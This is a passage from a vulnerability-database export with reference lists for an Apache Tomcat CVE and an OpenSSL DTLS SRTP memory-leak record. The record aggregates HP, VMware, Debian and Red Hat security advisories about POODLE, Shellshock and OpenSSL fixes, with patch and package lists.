        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0119"
      },
      {
        "trust": 0.2,
        "url": "http://advisories.mageia.org/mgasa-2015-0081.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0075"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0099"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0227"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0096"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2013-4002"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3625"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-8115"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3490"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-8114"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3530"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8114"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2013-5855"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3558"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0099"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0005"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3558"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5855"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0096"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0193"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3472"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0005"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3490"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3625"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3577"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3472"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3682"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3578"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4002"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0193"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0227"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0075"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2012-6153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-0119"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3530"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3578"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3682"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8115"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4590"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4322"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/tomcat7/7.0.52-1ubuntu0.1"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2302-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/tomcat6/6.0.35-1ubuntu3.5"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/tomcat6/6.0.24-2ubuntu1.16"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0235.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=brms\u0026downloadtype=distributions\u0026version=6.0.3"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4322"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4286"
      },
      {
        "trust": 0.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0148.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4590"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.0.1"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0096.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0075.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0099.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "http://software.hp.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0098"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6438"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/go/swa"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3981"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4248"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0706"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5345"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0714"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5346"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5174"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5351"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0230"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0033"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0234.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=bpm.suite\u0026downloadtype=distributions\u0026version=6.0.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67668"
      },
      {
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "db": "PACKETSTORM",
        "id": "130430"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "126842"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "136437"
      },
      {
        "db": "PACKETSTORM",
        "id": "130429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "67668"
      },
      {
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "db": "PACKETSTORM",
        "id": "130430"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "126842"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "136437"
      },
      {
        "db": "PACKETSTORM",
        "id": "130429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-05-27T00:00:00",
        "db": "BID",
        "id": "67668"
      },
      {
        "date": "2015-03-03T16:53:57",
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "date": "2014-07-30T22:53:18",
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "date": "2015-02-17T22:24:00",
        "db": "PACKETSTORM",
        "id": "130430"
      },
      {
        "date": "2015-03-03T16:54:21",
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "date": "2014-05-29T23:54:09",
        "db": "PACKETSTORM",
        "id": "126842"
      },
      {
        "date": "2014-07-03T23:00:39",
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "date": "2014-10-21T20:30:24",
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "date": "2016-03-26T13:13:00",
        "db": "PACKETSTORM",
        "id": "136437"
      },
      {
        "date": "2015-02-17T22:23:00",
        "db": "PACKETSTORM",
        "id": "130429"
      },
      {
        "date": "2014-05-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "date": "2014-05-31T11:17:13.297000",
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-05-23T16:27:00",
        "db": "BID",
        "id": "67668"
      },
      {
        "date": "2019-04-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "date": "2023-11-07T02:18:08.563000",
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apache Tomcat Digital error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      }
    ],
    "trust": 0.6
  }
}

VAR-201410-0371

Vulnerability from variot - Updated: 2024-07-23 21:06

Memory leak in d1_srtp.c in the DTLS SRTP extension in OpenSSL 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted handshake message. OpenSSL is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04540692

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04540692 Version: 1

HPSBGN03233 rev.1 - HP OneView running OpenSSL, Remote Denial of Service (DoS), Unauthorized Access, and Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2015-01-13 Last Updated: 2015-01-13

Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OneView running OpenSSL and Bash Shell. These vulnerabilities (POODLE and Shellshock) could be exploited remotely to create a Denial of Service (DoS), allow unauthorized access, or disclose information.

References:

CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 SSRT101739 SSRT101868

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OneView versions prior to 1.20

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2014-3513 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has released the following software update to resolve the vulnerabilities in HP OneView.

Existing users may upgrade to HP OneView version 1.20 using the Update Appliance feature in HP OneView.

HP OneView version 1.20 is available from the following location:

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =Z7550-63180

Note: The upgrade (.bin) or a new install (.ova) is also available:

An HP Passport login is required.

Go to the HP Software Depot site at http://www.software.hp.com and search for HP OneView.

HISTORY Version:1 (rev.1) - 13 January 2015 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

VMware vCenter Server, ESXi, Workstation, Player and Fusion address several security issues. Relevant Releases

VMware Workstation 10.x prior to version 10.0.5

VMware Player 6.x prior to version 6.0.5

VMware Fusion 7.x prior to version 7.0.1 VMware Fusion 6.x prior to version 6.0.5

vCenter Server 5.5 prior to Update 2d

ESXi 5.5 without patch ESXi550-201403102-SG, ESXi550-201501101-SG ESXi 5.1 without patch ESXi510-201404101-SG ESXi 5.0 without patch ESXi500-201405101-SG

Problem Description

a. VMware ESXi, Workstation, Player, and Fusion host privilege escalation vulnerability

  VMware ESXi, Workstation, Player and Fusion contain an arbitrary 
  file write issue. Exploitation this issue may allow for privilege
  escalation on the host.

  The vulnerability does not allow for privilege escalation from 
  the guest Operating System to the host or vice-versa. This means
  that host memory can not be manipulated from the Guest Operating
  System.

  Mitigation

  For ESXi to be affected, permissions must have been added to ESXi
  (or a vCenter Server managing it) for a virtual machine 
  administrator role or greater.

  VMware would like to thank Shanon Olsson for reporting this issue to
  us through JPCERT.

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the identifier CVE-2014-8370 to this issue.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is 
  available.

  VMware         Product    Running   Replace with/
  Product        Version    on        Apply Patch
  =============  =======    =======   =================
  Workstation    11.x       any       not affected
  Workstation    10.x       any       10.0.5

  Player         7.x        any       not affected
  Player         6.x        any       6.0.5

  Fusion         7.x        any       not affected
  Fusion         6.x        any       6.0.5

  ESXi           5.5        ESXi      ESXi550-201403102-SG
  ESXi           5.1        ESXi      ESXi510-201404101-SG 
  ESXi           5.0        ESXi      ESXi500-201405101-SG

b. VMware Workstation, Player, and Fusion Denial of Service vulnerability

  VMware Workstation, Player, and Fusion contain an input validation 
  issue in the Host Guest File System (HGFS). This issue may allow
  for a Denial of Service of the Guest Operating system.

  VMware would like to thank Peter Kamensky from Digital Security for 
  reporting this issue to us.

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the identifier CVE-2015-1043 to this issue.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is 
  available.

  VMware         Product    Running   Replace with/
  Product        Version    on        Apply Patch
  =============  =======    =======   =================
  Workstation    11.x       any       not affected
  Workstation    10.x       any       10.0.5

  Player         7.x        any       not affected
  Player         6.x        any       6.0.5

  Fusion         7.x        any       7.0.1
  Fusion         6.x        any       6.0.5

c. VMware ESXi, Workstation, and Player Denial of Service vulnerability

  VMware ESXi, Workstation, and Player contain an input
  validation issue in VMware Authorization process (vmware-authd). 
  This issue may allow for a Denial of Service of the host. On 
  VMware ESXi and on Workstation running on Linux the Denial of
  Service would be partial.

  VMware would like to thank Dmitry Yudin @ret5et for reporting
  this issue to us through HP's Zero Day Initiative.

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the identifier CVE-2015-1044 to this issue.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is 
  available.

  VMware         Product    Running   Replace with/
  Product        Version    on        Apply Patch
  =============  =======    =======   =================
  Workstation    11.x       any       not affected
  Workstation    10.x       any       10.0.5

  Player         7.x        any       not affected
  Player         6.x        any       6.0.5

  Fusion         7.x        any       not affected
  Fusion         6.x        any       not affected

  ESXi           5.5        ESXi      ESXi550-201501101-SG
  ESXi           5.1        ESXi      ESXi510-201410101-SG
  ESXi           5.0        ESXi      not affected

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the names CVE-2014-3513, CVE-2014-3567, 
  CVE-2014-3566 ("POODLE") and CVE-2014-3568 to these issues.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is
  available.

  VMware         Product    Running   Replace with/
  Product        Version    on        Apply Patch
  =============  =======    =======   =================
  vCenter Server 5.5        any       Update 2d*
  vCenter Server 5.1        any       patch pending
  vCenter Server 5.0        any       patch pending

  ESXi           5.5        ESXi      ESXi550-201501101-SG       
  ESXi           5.1        ESXi      patch pending
  ESXi           5.0        ESXi      patch pending

  * The VMware vCenter 5.5 SSO component will be 
    updated in a later release

e. Update to ESXi libxml2 package

  The libxml2 library is updated to version libxml2-2.7.6-17
  to resolve a security issue.

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the name CVE-2014-3660 to this issue.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is
  available.

  VMware         Product    Running   Replace with/
  Product        Version    on        Apply Patch
  =============  =======    =======   =================
  ESXi           5.5        ESXi      ESXi550-201501101-SG     
  ESXi           5.1        ESXi      patch pending
  ESXi           5.0        ESXi      patch pending

Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware Workstation 10.x

https://www.vmware.com/go/downloadworkstation

VMware Player 6.x

https://www.vmware.com/go/downloadplayer

VMware Fusion 7.x and 6.x

https://www.vmware.com/go/downloadplayer

vCenter Server

Downloads and Documentation: https://www.vmware.com/go/download-vsphere

ESXi 5.5 Update 2d

File: update-from-esxi5.5-5.5_update01.zip md5sum: 5773844efc7d8e43135de46801d6ea25 sha1sum: 6518355d260e81b562c66c5016781db9f077161f http://kb.vmware.com/kb/2065832 update-from-esxi5.5-5.5_update01 contains ESXi550-201403102-SG

ESXi 5.5

File: ESXi550-201501001.zip md5sum: b0f2edd9ad17d0bae5a11782aaef9304 sha1sum: 9cfcb1e2cf1bb845f0c96c5472d6b3a66f025dd1 http://kb.vmware.com/kb/2099265 ESXi550-201501001.zip contains ESXi550-201501101-SG

ESXi 5.1

File: ESXi510-201404001.zip md5sum: 9dc3c9538de4451244a2b62d247e52c4 sha1sum: 6b1ea36a2711665a670afc9ae37cdd616bb6da66 http://kb.vmware.com/kb/2070666 ESXi510-201404001 contains ESXi510-201404101-SG

ESXi 5.0

File: ESXi500-201405001.zip md5sum: 7cd1afc97f5f1e4b4132c90835f92e1d sha1sum: 4bd77eeb5d7fc65bbb6f25762b0fa74fbb9679d5 http://kb.vmware.com/kb/2075521 ESXi500-201405001 contains ESXi500-201405101-SG

Change log

2015-01-27 VMSA-2015-0001 Initial security advisory in conjunction with the release of VMware Workstation 10.0.5, VMware Player 6.0.5, vCenter Server 5.5 Update 2d and, ESXi 5.5 Patches released on 2015-01-27. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

Consolidated list of VMware Security Advisories http://kb.vmware.com/kb/2078735

VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html

VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html

Twitter https://twitter.com/VMwareSRC

Copyright 2015 VMware Inc. All rights reserved. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

This update adds support for Fallback SCSV to mitigate this issue.

CVE-2014-3568

When OpenSSL is configured with "no-ssl3" as a build option, servers
could accept and complete a SSL 3.0 handshake, and clients could be
configured to send them.

For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u13.

For the unstable distribution (sid), these problems have been fixed in version 1.0.1j-1.

We recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: openssl security update Advisory ID: RHSA-2014:1652-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1652.html Issue date: 2014-10-16 CVE Names: CVE-2014-3513 CVE-2014-3567 =====================================================================

Summary:

Updated openssl packages that contain a backported patch to mitigate the CVE-2014-3566 issue and fix two security issues are now available for Red Hat Enterprise Linux 6 and 7.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Description:

For additional information about this flaw, see the Knowledgebase article at https://access.redhat.com/articles/1232123

A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. (CVE-2014-3513)

A memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server. (CVE-2014-3567)

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: openssl-1.0.1e-30.el6_6.2.src.rpm

i386: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm

x86_64: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-devel-1.0.1e-30.el6_6.2.i686.rpm openssl-perl-1.0.1e-30.el6_6.2.i686.rpm openssl-static-1.0.1e-30.el6_6.2.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.2.i686.rpm openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: openssl-1.0.1e-30.el6_6.2.src.rpm

x86_64: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: openssl-1.0.1e-30.el6_6.2.src.rpm

i386: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-devel-1.0.1e-30.el6_6.2.i686.rpm

ppc64: openssl-1.0.1e-30.el6_6.2.ppc.rpm openssl-1.0.1e-30.el6_6.2.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.2.ppc.rpm openssl-devel-1.0.1e-30.el6_6.2.ppc64.rpm

s390x: openssl-1.0.1e-30.el6_6.2.s390.rpm openssl-1.0.1e-30.el6_6.2.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.s390x.rpm openssl-devel-1.0.1e-30.el6_6.2.s390.rpm openssl-devel-1.0.1e-30.el6_6.2.s390x.rpm

x86_64: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.2.i686.rpm openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-perl-1.0.1e-30.el6_6.2.i686.rpm openssl-static-1.0.1e-30.el6_6.2.i686.rpm

ppc64: openssl-debuginfo-1.0.1e-30.el6_6.2.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.2.ppc64.rpm openssl-static-1.0.1e-30.el6_6.2.ppc64.rpm

s390x: openssl-debuginfo-1.0.1e-30.el6_6.2.s390x.rpm openssl-perl-1.0.1e-30.el6_6.2.s390x.rpm openssl-static-1.0.1e-30.el6_6.2.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm

